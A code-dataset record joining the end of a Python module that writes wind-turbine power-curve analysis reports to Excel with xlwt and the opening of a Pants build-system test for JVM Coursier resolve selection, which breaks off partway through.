sh.write(row,col+11, "TRUE" if totalHoursValid else "FALSE")
if belowAbove:
belowAboveValid = calib.getBelowAboveValidity(key, timeStepInSeconds)
sh.write(row,col+12, "TRUE" if belowAboveValid else "FALSE")
speedUpChangeValid = calib.getSpeedUpChangeValidity(key)
sh.write(row,col+13, "TRUE" if speedUpChangeValid else "FALSE")
sectorValid = calib.getSectorValidity(key, timeStepInSeconds)
sh.write(row,col+14, "TRUE" if sectorValid else "FALSE", self.bold_style)
row += 1
if len(conf.calibrationFilters) > 0:
row += 2
sh.write(row, col, "Calibration Filters", self.bold_style)
row += 1
sh.write(row, col, "Data Column", self.bold_style)
sh.write(row, col+1, "Filter Type", self.bold_style)
sh.write(row, col+2, "Inclusive", self.bold_style)
sh.write(row, col+3, "Filter Value", self.bold_style)
sh.write(row, col+4, "Active", self.bold_style)
row += 1
for filt in conf.calibrationFilters:
if isinstance(Filter,TimeOfDayFilter):
sh.write(row, col, "Time Of Day Filter")
sh.write(row, col + 1, str(filt.startTime))
sh.write(row, col + 2, str(filt.endTime))
sh.write(row, col + 3, str(filt.daysOfTheWeek))
sh.write(row, col + 4, str(filt.months))
else:
sh.write(row, col, filt.column)
sh.write(row, col+1, filt.filterType)
sh.write(row, col+2, filt.inclusive)
sh.write(row, col+3, str(filt))
sh.write(row, col+4, filt.active) # always true if in list...
row += 1
def reportSettings(self, sh, analysis):
config = analysis
sh.write(0, 1, "PCWG Tool Version Number:")
sh.write(0, 2, self.version)
sh.write(0, 3, xlwt.Formula('HYPERLINK("http://www.pcwg.org";"PCWG Website")'))
row = 3
labelColumn = 1
dataColumn = 2
sh.col(labelColumn).width = 256 * 30
sh.col(dataColumn).width = 256 * 50
sh.col(dataColumn+1).width = 256 * 50
#Corretions
sh.write(row, labelColumn, "Density Correction Active", self.bold_style)
sh.write(row, dataColumn, config.densityCorrectionActive)
row += 1
sh.write(row, labelColumn, "REWS Correction Active", self.bold_style)
sh.write(row, dataColumn, config.rewsActive)
row += 1
sh.write(row, labelColumn, "Turbulence Correction Active", self.bold_style)
sh.write(row, dataColumn, config.turbRenormActive)
row += 1
#General Settings
row += 1
sh.write(row, labelColumn, "Time Step In Seconds", self.bold_style)
sh.write(row, dataColumn, analysis.timeStepInSeconds)
row += 1
sh.write(row, labelColumn, "Power Curve Minimum Count", self.bold_style)
sh.write(row, dataColumn, config.powerCurveMinimumCount)
row += 1
sh.write(row, labelColumn, "Power Curve Mode", self.bold_style)
sh.write(row, dataColumn, config.powerCurveMode)
row += 1
#Inner Range
row += 1
sh.write(row, labelColumn, "Inner Range", self.bold_style)
row += 1
for dimension in config.inner_range_dimensions:
sh.write(row, labelColumn, "Lower {0}".format(dimension.parameter), self.bold_style)
sh.write(row, dataColumn, dimension.lower_limit)
row += 1
sh.write(row, labelColumn, "Upper {0}".format(dimension.parameter), self.bold_style)
sh.write(row, dataColumn, dimension.upper_limit)
row += 1
#Turbine
#row += 1
#sh.write(row, labelColumn, "Turbine", self.bold_style)
#row += 1
#sh.write(row, labelColumn, "Specified Power Curve", self.bold_style)
#sh.write(row, dataColumn, config.specified_power_curve.absolute_path)
#row += 1
#datasets
row += 1
sh.write(row, labelColumn, "Datasets", self.bold_style)
row += 2
for datasetConfig in analysis.datasetConfigs:
sh.write(row, labelColumn, "Name", self.bold_style)
sh.write(row, dataColumn, datasetConfig.name)
row += 1
sh.write(row, labelColumn, "Path", self.bold_style)
sh.write(row, dataColumn, datasetConfig.path)
row += 1
sh.write(row, labelColumn, "Rated Power", self.bold_style)
sh.write(row, dataColumn, datasetConfig.ratedPower)
row += 1
sh.write(row, labelColumn, "HubHeight", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubHeight)
row += 1
sh.write(row, labelColumn, "Diameter", self.bold_style)
sh.write(row, dataColumn, datasetConfig.diameter)
row += 1
sh.write(row, labelColumn, "Cut In Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.cutInWindSpeed)
row += 1
sh.write(row, labelColumn, "Cut Out Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.cutOutWindSpeed)
row += 1
sh.write(row, labelColumn, "Start Date", self.bold_style)
sh.write(row, dataColumn, str(datasetConfig.startDate))
row += 1
sh.write(row, labelColumn, "End Date", self.bold_style)
sh.write(row, dataColumn, str(datasetConfig.endDate))
row += 1
sh.write(row, labelColumn, "Hub Wind Speed Mode", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubWindSpeedMode)
row += 1
sh.write(row, labelColumn, "Density Mode", self.bold_style)
sh.write(row, dataColumn, datasetConfig.densityMode)
row += 2
sh.write(row, labelColumn, "REWS Defined", self.bold_style)
sh.write(row, dataColumn, datasetConfig.rewsDefined)
row += 1
sh.write(row, labelColumn, "Rotor Mode", self.bold_style)
sh.write(row, dataColumn, datasetConfig.rotorMode)
row += 1
sh.write(row, labelColumn, "Hub Mode", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubMode)
row += 1
sh.write(row, labelColumn, "Number of Rotor Levels", self.bold_style)
sh.write(row, dataColumn, datasetConfig.numberOfRotorLevels)
row += 2
sh.write(row, labelColumn, "Measurements", self.bold_style)
row += 1
sh.write(row, labelColumn, "Input Time Series Path", self.bold_style)
sh.write(row, dataColumn, datasetConfig.input_time_series.absolute_path)
row += 1
sh.write(row, labelColumn, "Date Format", self.bold_style)
sh.write(row, dataColumn, datasetConfig.dateFormat)
row += 1
sh.write(row, labelColumn, "Time Step In Seconds", self.bold_style)
sh.write(row, dataColumn, datasetConfig.timeStepInSeconds)
row += 1
sh.write(row, labelColumn, "Time Stamp", self.bold_style)
sh.write(row, dataColumn, datasetConfig.timeStamp)
row += 1
sh.write(row, labelColumn, "Bad Data Value", self.bold_style)
sh.write(row, dataColumn, datasetConfig.badData)
row += 1
sh.write(row, labelColumn, "Header Rows", self.bold_style)
sh.write(row, dataColumn, datasetConfig.headerRows)
row += 1
sh.write(row, labelColumn, "Turbine Location Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.turbineLocationWindSpeed)
row += 1
sh.write(row, labelColumn, "Hub Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubWindSpeed)
row += 1
sh.write(row, labelColumn, "Hub Turbulence", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubTurbulence)
row += 1
sh.write(row, labelColumn, "Reference Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.referenceWindSpeed)
row += 1
sh.write(row, labelColumn, "Reference Wind Speed Std Dev", self.bold_style)
sh.write(row, dataColumn, datasetConfig.referenceWindSpeedStdDev)
row += 1
sh.write(row, labelColumn, "Reference Wind Direction", self.bold_style)
sh.write(row, dataColumn, datasetConfig.referenceWindDirection)
row += 1
sh.write(row, labelColumn, "Reference Wind Direction Offset", self.bold_style)
sh.write(row, dataColumn, datasetConfig.referenceWindDirectionOffset)
row += 1
sh.write(row, labelColumn, "Density", self.bold_style)
sh.write(row, dataColumn, datasetConfig.density)
row += 1
sh.write(row, labelColumn, "Temperature", self.bold_style)
sh.write(row, dataColumn, datasetConfig.temperature)
row += 1
sh.write(row, labelColumn, "Pressure", self.bold_style)
sh.write(row, dataColumn, datasetConfig.pressure)
row += 1
if len(datasetConfig.turbineShearMeasurements) > 0:
row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.referenceShearMeasurements,'Reference Location ')
row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.turbineShearMeasurements,'Turbine Location ')
else:
row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.referenceShearMeasurements)
sh.write(row, labelColumn, "Power", self.bold_style)
sh.write(row, dataColumn, datasetConfig.power)
row += 2
if datasetConfig.rewsDefined:
sh.write(row, labelColumn, "Profile Levels", self.bold_style)
row += 1
sh.write(row, labelColumn, "Height", self.bold_style)
sh.write(row, dataColumn, "Speed", self.bold_style)
sh.write(row, dataColumn + 1, "Direction", self.bold_style)
row += 1
for height in sorted(datasetConfig.data.windSpeedLevels):
sh.write(row, labelColumn, height)
sh.write(row, dataColumn, datasetConfig.data.windSpeedLevels[height])
if hasattr(datasetConfig.data, 'windDirectionLevels'): # we are not using this in REWS yet
if height in datasetConfig.data.windDirectionLevels:
sh.write(row, dataColumn + 1, datasetConfig.data.windDirectionLevels[height])
row += 1
sh.write(row, labelColumn, "Filters", self.bold_style)
row += 1
sh.write(row, labelColumn, "Data Column", self.bold_style)
sh.write(row, dataColumn, "Filter Type", self.bold_style)
sh.write(row, dataColumn + 1, "Inclusive", self.bold_style)
sh.write(row, dataColumn + 2, "Filter Value", self.bold_style)
sh.write(row, dataColumn + 3, "Active", self.bold_style)
row += 1
for filter in datasetConfig.filters:
if isinstance(Filter,TimeOfDayFilter):
sh.write(row, labelColumn, "Time Of Day Filter")
sh.write(row, dataColumn, str(filter.startTime))
sh.write(row, dataColumn + 1, str(filter.endTime))
sh.write(row, dataColumn + 2, str(filter.daysOfTheWeek))
sh.write(row, dataColumn + 3, str(filter.months))
else:
sh.write(row, labelColumn, filter.column)
sh.write(row, dataColumn, filter.filterType)
sh.write(row, dataColumn + 1, filter.inclusive)
sh.write(row, dataColumn + 2, str(filter))
sh.write(row, dataColumn + 3, "True") # always true if in list...
row += 1
def writeShear(self,sh,labelColumn,dataColumn,row,shearList,prefix=""):
i = 0
for sh_meas in shearList:
sh.write(row, labelColumn, prefix+"Shear Measurement " + str(i+1), self.bold_style)
sh.write(row, dataColumn, sh_meas.wind_speed_column)
row += 1
sh.write(row, labelColumn, prefix+"Shear Measurement {0} Height ".format(i+1), self.bold_style)
sh.write(row, dataColumn, sh_meas.height)
row += 1
i += 1
return row
def reportPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve, analysis):
powerCurveLevels = powerCurve.data_frame.copy()
if powerCurve.wind_speed_column is None:
powerCurveLevels['Specified Wind Speed'] = powerCurveLevels.index
wind_speed_col = 'Specified Wind Speed'
else:
wind_speed_col = powerCurve.wind_speed_column
powerCurveLevels = powerCurveLevels.sort(wind_speed_col)
sh.write(rowOffset, columnOffset + 2, name, self.bold_style)
sh.col(columnOffset + 1).width = 256 * 15
sh.col(columnOffset + 2).width = 256 * 15
sh.col(columnOffset + 3).width = 256 * 15
if powerCurve.wind_speed_column is None:
sh.col(columnOffset + 5).width = 256 * 5
else:
sh.col(columnOffset + 4).width = 256 * 15
sh.col(columnOffset + 5).width = 256 * 5
rowOrders = {'Data Count': 4, analysis.actualPower: 2, analysis.hubTurbulence: 3,
analysis.baseline.wind_speed_column: 1, 'Specified Power': 2, 'Specified Turbulence': 3,
'Specified Wind Speed': 1, analysis.measuredTurbulencePower:2, wind_speed_col: 1}
styles = {'Data Count': self.no_dp_style, analysis.baseline.wind_speed_column: self.two_dp_style,
analysis.actualPower: self.no_dp_style, analysis.hubTurbulence: self.percent_no_dp_style,
'Specified Power': self.no_dp_style, 'Specified Turbulence': self.percent_no_dp_style,
'Specified Wind Speed': self.two_dp_style, analysis.measuredTurbulencePower: self.no_dp_style,
wind_speed_col: self.two_dp_style}
for colname in powerCurveLevels.columns:
if colname in styles.keys():
sh.write(rowOffset + 1, columnOffset + rowOrders[colname], colname, self.bold_style)
countRow = 1
for windSpeed in powerCurveLevels.index:
for colname in powerCurveLevels.columns:
if colname in styles.keys():
val = powerCurveLevels[colname][windSpeed]
if type(val) is np.int64:
#xlwt needs numbers to be recognisable as integers or floats; isinstance(np.int64(1), int) returns False.
#Other numpy types (int32, float64, etc) are recognised as int and float appropriately.
val = int(val)
sh.write(rowOffset + countRow + 1, columnOffset + rowOrders[colname], val, styles[colname])
countRow += 1
if hasattr(powerCurve, 'zeroTurbulencePowerCurve'):
countRow += 3
try:
pc = powerCurve.zeroTurbulencePowerCurve.dfPowerLevels
sh.write(rowOffset + countRow, columnOffset + 2, name + ' Zero TI Power Curve', self.bold_style)
countRow += 1
sh.write(rowOffset + countRow, columnOffset + 1, 'Wind Speed', self.bold_style)
sh.write(rowOffset + countRow, columnOffset + 2, 'Power', self.bold_style)
for ws in pc.index:
sh.write(rowOffset + countRow + 1, columnOffset + 1, ws, styles['Specified Wind Speed'])
sh.write(rowOffset + countRow + 1, columnOffset + 2, pc.loc[ws, 'Power'], styles['Specified Wind Speed'])
countRow += 1
except:
sh.write(rowOffset + countRow, columnOffset + 2,'Zero TI Power Curve not calculated successfully for %s power curve.' % name)
countRow+=1
else:
countRow += 3
Status.add("Not reporting zero TI power curve for %s as it is not defined." % (name), verbosity=2)
sh.write(rowOffset + countRow, columnOffset + 2,"Not reporting zero TI power curve for %s as it is not defined." % (name))
countRow+=1
return countRow
def reportInterpolatedPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve, levels):
sh.write(rowOffset, columnOffset + 2, name, self.bold_style)
sh.write(rowOffset + 1, columnOffset + 1, "Wind Speed", self.bold_style)
sh.write(rowOffset + 1, columnOffset + 2, "Power", self.bold_style)
sh.write(rowOffset + 1, columnOffset + 3, "Turbulence", self.bold_style)
count = 1
for windSpeed in sorted(levels):
sh.write(rowOffset + count + 1, columnOffset + 1, windSpeed, self.two_dp_style)
sh.write(rowOffset + count + 1, columnOffset + 2, float(powerCurve.power_function(windSpeed)), self.no_dp_style)
sh.write(rowOffset + count + 1, columnOffset + 3, float(powerCurve.turbulence_function(windSpeed)), self.percent_no_dp_style)
count += 1
def reportPowerDeviations(self, book, sheetName, powerDeviations, gradient):
sheet = PowerDeviationMatrixSheet(self.calculated_power_deviation_matrix_dimensions)
sheet.report(book, sheetName, powerDeviations, gradient)
def report_aep(self,sh,analysis):
sh # get tables in PP report form
# Summary of EY acceptance test results:
hrsMultiplier = (analysis.timeStepInSeconds/3600.0)
row = 2
tall_style = xlwt.easyxf('font:height 360;') # 18pt
first_row = sh.row(row)
first_row.set_style(tall_style)
sh.write(row,2, "Reference Turbine", self.bold_style)
sh.write(row,3, "Measured (LCB) Pct of Warranted Annual Energy Yield (%)", self.bold_style)
sh.write(row,4, "Extrapolated Pct of Warranted Annual Energy Yield (%)", self.bold_style)
sh.write(row,5, "Last Complete Bin (LCB)", self.bold_style)
sh.write(row,6, "Direction Sectors Analysed (degrees)", self.bold_style)
sh.write(row,7, "Measured Hours", self.bold_style)
#sh.write(row,8, "Annual Energy Yield Uncertainty as a percentage of the Warranted Annual Yield (%)", self.bold_style)
row += 1
sh.write(row,2, analysis.Name)
sh.write(row,3, analysis.aepCalcLCB.AEP*100, self.two_dp_style)
sh.write(row,4, analysis.aepCalc.AEP*100, self.two_dp_style)
sh.write(row,5, analysis.aepCalcLCB.lcb, self.two_dp_style)
sh.write(row,6, "{mi} - {ma}".format(mi=analysis.dataFrame[analysis.windDirection].min(),ma=analysis.dataFrame[analysis.windDirection].max()))
timeCovered = analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount].sum() * hrsMultiplier
sh.write(row,7, timeCovered, self.two_dp_style)
#sh.write(row,8, "NOT YET CALCULATED")
row += 3
if hasattr(analysis.specified_power_curve,"referenceDensity"):
sh.write_merge(row,row,2,6, "Measured Power Curve\n Reference Air Density = {ref} kg/m^3".format(ref=analysis.specified_power_curve.referenceDensity), self.bold_style)
#sh.write(row,7, "Category A Uncertainty", self.bold_style)
#sh.write(row,8, "Category B Uncertainty", self.bold_style)
#sh.write(row,9, "Category C Uncertainty", self.bold_style)
row += 1
sh.write(row,2, "Bin No", self.bold_style)
sh.write(row,3, "Bin Centre Wind Speed", self.bold_style)
sh.write(row,4, "Hub Height Wind Speed", self.bold_style)
sh.write(row,5, "Power Output", self.bold_style)
sh.write(row,6, "Cp", self.bold_style)
sh.write(row,7, "Qty 10-Min Data", self.bold_style)
sh.write(row,8, "Standard Deviation", self.bold_style)
#sh.write(row,7, "Standard Uncertainty", self.bold_style)
#sh.write(row,8, "Standard Uncertainty", self.bold_style)
#sh.write(row,9, "Standard Uncertainty", self.bold_style)
row += 1
sh.write(row,2, "I", self.bold_style)
sh.write(row,3, "Vi_centre", self.bold_style)
sh.write(row,4, "Vi", self.bold_style)
sh.write(row,5, "Pi", self.bold_style)
sh.write(row,7, "Ni", self.bold_style)
sh.write(row,8, "StDev i", self.bold_style)
#sh.write(row,7, "si", self.bold_style)
#sh.write(row,8, "ui", self.bold_style)
#sh.write(row,9, "uc,I", self.bold_style)
row += 1
sh.write(row,3, "[m/s]", self.bold_style)
sh.write(row,4, "[kW]", self.bold_style)
sh.write(row,8, "[kW]", self.bold_style)
#sh.write(row,7, "[kW]", self.bold_style)
#sh.write(row,8, "[kW]", self.bold_style)
#sh.write(row,9, "[kW]", self.bold_style)
for binNo,ws in enumerate(analysis.allMeasuredPowerCurve.data_frame.index):
if ws <= analysis.aepCalcLCB.lcb and analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount][ws] > 0:
row+=1
sh.write(row,2, binNo+1, self.no_dp_style)
sh.write(row,3, ws, self.one_dp_style)
sh.write(row,4, analysis.allMeasuredPowerCurve.data_frame[analysis.baseline.wind_speed_column][ws], self.two_dp_style)
sh.write(row,5, analysis.allMeasuredPowerCurve.data_frame[analysis.actualPower][ws], self.two_dp_style)
if analysis.powerCoeff in analysis.allMeasuredPowerCurve.data_frame.columns:
sh.write(row,6, analysis.allMeasuredPowerCurve.data_frame[analysis.powerCoeff][ws], self.two_dp_style)
else:
sh.write(row,6, "-", self.no_dp_style)
datCount = analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount][ws]
sh.write(row,7, datCount, self.no_dp_style)
if analysis.powerStandDev in analysis.allMeasuredPowerCurve.data_frame.columns:
sh.write(row,8, analysis.allMeasuredPowerCurve.data_frame[analysis.powerStandDev][ws])
else:
sh.write(row,8, "-", self.no_dp_style)
#sh.write(row,7, "-", self.no_dp_style)
#sh.write(row,8, "~", self.no_dp_style)
#sh.write(row,9, "-", self.no_dp_style)
row+=2
sh.write_merge(row,row,2,5, "More than 180 hours of data:", self.bold_style)
sh.write(row,6, "TRUE" if timeCovered > 180 else "FALSE")
sh.write(row,7, "({0} Hours)".format(round(timeCovered,2)) , self.two_dp_style)
row+=1
if hasattr(analysis,"windSpeedAt85pctX1pnt5"):
sh.write_merge(row,row,2,5, "Largest WindSpeed > {0}:".format(round(analysis.windSpeedAt85pctX1pnt5,2)), self.bold_style)
sh.write(row,6, "TRUE" if analysis.aepCalcLCB.lcb > analysis.windSpeedAt85pctX1pnt5 else "FALSE")
sh.write(row,7, "Threshold is 1.5*([email protected]*RatedPower)")
row+=1
sh.write_merge(row,row,2,5, "AEP Extrap. within 1% of AEP LCB:",self.bold_style)
ans = abs(1-(analysis.aepCalc.AEP/analysis.aepCalcLCB.AEP)) < 0.01
sh.write(row,6, "TRUE" if ans else "FALSE")
if not ans:
sh.write(row,8, analysis.aepCalc.AEP)
sh.write(row,9, analysis.aepCalcLCB.AEP)
if analysis.turbRenormActive:
row += 2
sh.write(row,3, "Turbulence Corrected Measured (LCB) Pct of Warranted Annual Energy Yield (%)", self.bold_style)
sh.write(row,4, "Turbulence Corrected Extrapolated Pct of Warranted Annual Energy Yield (%)", self.bold_style)
sh.write(row+1,3, analysis.turbCorrectedAepCalcLCB.AEP*100, self.two_dp_style)
sh.write(row+1,4, analysis.turbCorrectedAepCalc.AEP*100, self.two_dp_style)
row+=2
sh.write_merge(row,row,3,10,"AEP Distribution",self.bold_style)
row+=1
sh.write_merge(row,row,3,6, "Reference", self.bold_style)
sh.write_merge(row,row,7,10, "Measured", self.bold_style)
row+=1
sh.write(row,2,"Wind Speed",self.bold_style)
sh.write(row,3,'Reference Freq',self.bold_style)
sh.write(row,4,'Reference Power',self.bold_style)
sh.write(row,5,'Reference Power (Resampled)',self.bold_style)
sh.write(row,6,"Reference Energy",self.bold_style)
sh.write(row,7,'Measured Freq',self.bold_style)
sh.write(row,8,'Measured Power',self.bold_style)
sh.write(row,9,'Measured Power (Resampled)',self.bold_style)
sh.write(row,10,"Measured Energy",self.bold_style)
for binNum in analysis.aepCalc.energy_distribution.index:
row+=1
sh.write(row,2,binNum,self.two_dp_style)
sh.write(row,3,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Freq"] ,self.four_dp_style)
sh.write(row,4,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Upper"] ,self.four_dp_style)
sh.write(row,5,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Power"] ,self.four_dp_style)
sh.write(row,6,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Energy"] ,self.four_dp_style)
sh.write(row,7,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Freq"] ,self.four_dp_style)
sh.write(row,8,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Upper"] ,self.four_dp_style)
sh.write(row,9,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Power"] ,self.four_dp_style)
sh.write(row,10,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Energy"] ,self.four_dp_style)
row+=3
def write_power_curves(self):
Status.add("Wind Speed\tSpecified\tInner\tOuter\tAll", verbosity=2)
for i in range(self.windSpeedBins.numberOfBins):
windSpeed = self.windSpeedBins.binCenterByIndex(i)
text = "%0.4f\t" % windSpeed
if windSpeed in self.specified_power_curve.data_frame:
text += "%0.4f\t" % self.specified_power_curve.data_frame[windSpeed]
else:
text += "\t"
if windSpeed in self.innerMeasuredPowerCurve.data_frame:
text += "%0.4f\t" % self.innerMeasuredPowerCurve.data_frame[windSpeed]
else:
text += "\t"
if windSpeed in self.outerMeasuredPowerCurve.data_frame:
text += "%0.4f\t" % self.outerMeasuredPowerCurve.data_frame[windSpeed]
else:
text += "\t"
if windSpeed in self.allMeasuredPowerCurve.data_frame:
text += "%0.4f\t" % self.allMeasuredPowerCurve.data_frame[windSpeed]
else:
text += "\t"
Status.add(text, verbosity=2)
def write_power_deviation_matrix(self):
for j in reversed(range(self.turbulenceBins.numberOfBins)):
turbulence = self.turbulenceBins.binCenterByIndex(j)
text = "%f\t" % turbulence
for i in range(self.windSpeedBins.numberOfBins):
windSpeed = self.windSpeedBins.binCenterByIndex(i)
if windSpeed in self.powerDeviations:
if turbulence in self.powerDeviations[windSpeed]:
text += "%f\t" % self.powerDeviations[windSpeed][turbulence]
else:
text += "\t"
else:
text += "\t"
Status.add(text, verbosity=2)
text = "\t"
for i in range(self.windSpeedBins.numberOfBins):
text += "%f\t" % self.windSpeedBins.binCenterByIndex(i)
Status.add(text, verbosity=2)
def report_scatter_metric(self,sh,analysis,row, turbRenormActive):
row += 5
sh.write(row, 1, "Scatter Metric Before TI Renormalisation:", self.bold_style)
sh.write(row+1, 1, analysis.powerCurveScatterMetric, self.percent_style)
if turbRenormActive:
sh.write(row, 2, "Scatter Metric After TI Renormalisation:", self.bold_style)
sh.write(row+1, 2, analysis.powerCurveScatterMetricAfterTiRenorm , self.percent_style)
return row + 3
class AnonReport(Report):
def __init__(self,targetPowerCurve,wind_bins, turbulence_bins, version="unknown"):
self.version = version
self.targetPowerCurve = targetPowerCurve
self.turbulenceBins = turbulence_bins
self.normalisedWindSpeedBins = wind_bins
def report(self, path, analysis, powerDeviationMatrix = True, scatterMetric=True):
self.analysis = analysis
book = xlwt.Workbook()
sh = book.add_sheet("Anonymous Report", cell_overwrite_ok=True)
sh.write(0, 0, "PCWG Tool Version Number:")
sh.write(0, 1, self.version)
sh.write(0, 2, xlwt.Formula('HYPERLINK("http://www.pcwg.org";"PCWG Website")'))
row = 1
if powerDeviationMatrix:
row = self.report_power_deviation_matrix(sh,analysis,book)
if scatterMetric:
row = self.report_scatter_metric(sh,analysis,row, analysis.turbRenormActive)
book.save(path)
def report_power_deviation_matrix(self,sh,analysis,book):
gradient = colour.ColourGradient(-0.1, 0.1, 0.01, book)
pcStart = 2
pcEnd = pcStart + self.normalisedWindSpeedBins.numberOfBins + 5
deviationMatrixStart = pcEnd + 5
row= []
row.append( self.reportPowerCurve(sh, pcStart, 0, self.targetPowerCurve.name + ' Power Curve', self.targetPowerCurve) )
row.append( self.reportPowerDeviations(sh,deviationMatrixStart, analysis.normalisedHubPowerDeviations, gradient, "Hub Power"))
if analysis.normalisedTurbPowerDeviations != None:
deviationMatrixStart += (self.turbulenceBins.numberOfBins + 5) * 2
row.append(self.reportPowerDeviations(sh,deviationMatrixStart, analysis.normalisedTurbPowerDeviations, gradient, "Turb Corrected Power") )
return max(row)
def reportPowerDeviations(self,sh, startRow, powerDeviations, gradient, name):
countShift = self.turbulenceBins.numberOfBins + 5
sh.write(startRow, 1, "Deviations Matrix (%s)" % name, self.bold_style)
sh.write(startRow + countShift, 1, "Data Count Matrix (%s)" % name, self.bold_style)
for j in range(self.turbulenceBins.numberOfBins):
turbulence = self.turbulenceBins.binCenterByIndex(j)
row = startRow + self.turbulenceBins.numberOfBins - j
countRow = row + countShift
sh.write(row, 0, turbulence, self.percent_no_dp_style)
sh.write(countRow, 0, turbulence, self.percent_no_dp_style)
for i in range(self.normalisedWindSpeedBins.numberOfBins):
windSpeed = self.normalisedWindSpeedBins.binCenterByIndex(i)
col = i + 1
if j == 0:
sh.write(row + 1, col, windSpeed, self.two_dp_style)
sh.write(countRow + 1, col, windSpeed, self.two_dp_style)
if windSpeed in powerDeviations.matrix:
if turbulence in powerDeviations.matrix[windSpeed]:
deviation = powerDeviations.matrix[windSpeed][turbulence]
count = int(powerDeviations.count[windSpeed][turbulence])
if not np.isnan(deviation):
sh.write(row, col, deviation, gradient.getStyle(deviation))
sh.write(countRow, col, count, self.no_dp_style)
return startRow + self.turbulenceBins.numberOfBins + countShift
def reportPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve):
sh.write(rowOffset, columnOffset + 2, name, self.bold_style)
rowOrders = { 'Data Count':4, 'Normalised Wind Speed':1,'Normalised Power':2, 'Turbulence':3}
for colname in rowOrders.keys():
sh.write(rowOffset + 1, columnOffset + rowOrders[colname], colname, self.bold_style)
countRow = 1
for i in range(self.normalisedWindSpeedBins.numberOfBins):
windSpeed = self.normalisedWindSpeedBins.binCenterByIndex(i)
mask = self.analysis.dataFrame['Normalised WS Bin'] == windSpeed
dataCount = self.analysis.dataFrame[mask]['Normalised WS Bin'].count()
absoluteWindSpeed = windSpeed * self.analysis.observedRatedWindSpeed
sh.write(rowOffset + countRow + 1, columnOffset + 1, windSpeed, self.two_dp_style)
sh.write(rowOffset + countRow + 1, columnOffset + 4,
dataCount, self.no_dp_style)
if dataCount > 0:
sh.write(rowOffset + countRow + 1, columnOffset + 2,
float(powerCurve.powerFunction(absoluteWindSpeed))/self.analysis.observedRatedPower, self.two_dp_style)
sh.write(rowOffset + countRow + 1, columnOffset + 3,
float(powerCurve.turbulenceFunction(absoluteWindSpeed)), self.percent_no_dp_style)
countRow += 1
return countRow
|
PCWG/PCWG
|
pcwg/reporting/reporting.py
|
reporting.py
|
py
| 47,780 |
python
|
en
|
code
| 23 |
github-code
|
6
|
26043118086
|
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.java.target_types import JavaSourcesGeneratorTarget
from pants.backend.java.target_types import rules as target_types_rules
from pants.core.util_rules import config_files, source_files
from pants.engine.addresses import Address, Addresses
from pants.jvm.resolve.common import Coordinate
from pants.jvm.resolve.coursier_fetch import NoCompatibleResolve
from pants.jvm.resolve.coursier_fetch import rules as coursier_fetch_rules
from pants.jvm.resolve.key import CoursierResolveKey
from pants.jvm.target_types import DeployJarTarget, JvmArtifactTarget
from pants.jvm.testutil import maybe_skip_jdk_test
from pants.jvm.util_rules import rules as util_rules
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, QueryRule, RuleRunner, engine_error
NAMED_RESOLVE_OPTIONS = (
'--jvm-resolves={"one": "coursier_resolve.lockfile", "two": "coursier_resolve.lockfile"}'
)
DEFAULT_RESOLVE_OPTION = "--jvm-default-resolve=one"
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*config_files.rules(),
*coursier_fetch_rules(),
*source_files.rules(),
*util_rules(),
*target_types_rules(),
QueryRule(CoursierResolveKey, (Addresses,)),
],
target_types=[DeployJarTarget, JavaSourcesGeneratorTarget, JvmArtifactTarget],
)
rule_runner.set_options(
args=[
NAMED_RESOLVE_OPTIONS,
DEFAULT_RESOLVE_OPTION,
],
env_inherit=PYTHON_BOOTSTRAP_ENV,
)
return rule_runner
def assert_resolve(
expected_resolve: str,
rule_runner: RuleRunner,
root_one_resolve: str,
root_two_resolve: str,
leaf_resolve: str,
) -> None:
rule_runner.write_files(
{
"BUILD": dedent(
f"""\
deploy_jar(name='root_one', main='Ex', dependencies=[':leaf'], resolve='{root_one_resolve}')
deploy_jar(name='root_two', main='Ex', dependencies=[':leaf'], resolve='{root_two_resolve}')
jvm_artifact(
name='leaf',
group='ex',
artifact='ex',
version='0.0.0',
resolve='{leaf_resolve}',
)
"""
),
"coursier_resolve.lockfile": "[]",
}
)
resolve_key = rule_runner.request(
CoursierResolveKey,
# NB: Although it will not happen for `deploy_jars` in production, we resolve two of them
# together here to validate the handling of multiple roots, which _can_ happen for things
# like the `repl` goal, and other goals which create an adhoc merged Classpath.
[
Addresses(
[
Address(spec_path="", target_name="root_one"),
Address(spec_path="", target_name="root_two"),
]
)
],
)
assert resolve_key.name == expected_resolve
@maybe_skip_jdk_test
def test_all_matching(rule_runner: RuleRunner) -> None:
assert_resolve("one", rule_runner, "one", "one", "one")
@maybe_skip_jdk_test
def test_no_matching_for_root(rule_runner: RuleRunner) -> None:
with engine_error(NoCompatibleResolve):
assert_resolve("n/a", rule_runner, "one", "two", "two")
@maybe_skip_jdk_test
def test_no_matching_for_leaf(rule_runner: RuleRunner) -> None:
with engine_error(NoCompatibleResolve):
assert_resolve("n/a", rule_runner, "one", "one", "two")
@pytest.mark.parametrize(
"coord_str,expected",
(
("group:artifact:version", Coordinate("group", "artifact", "version")),
(
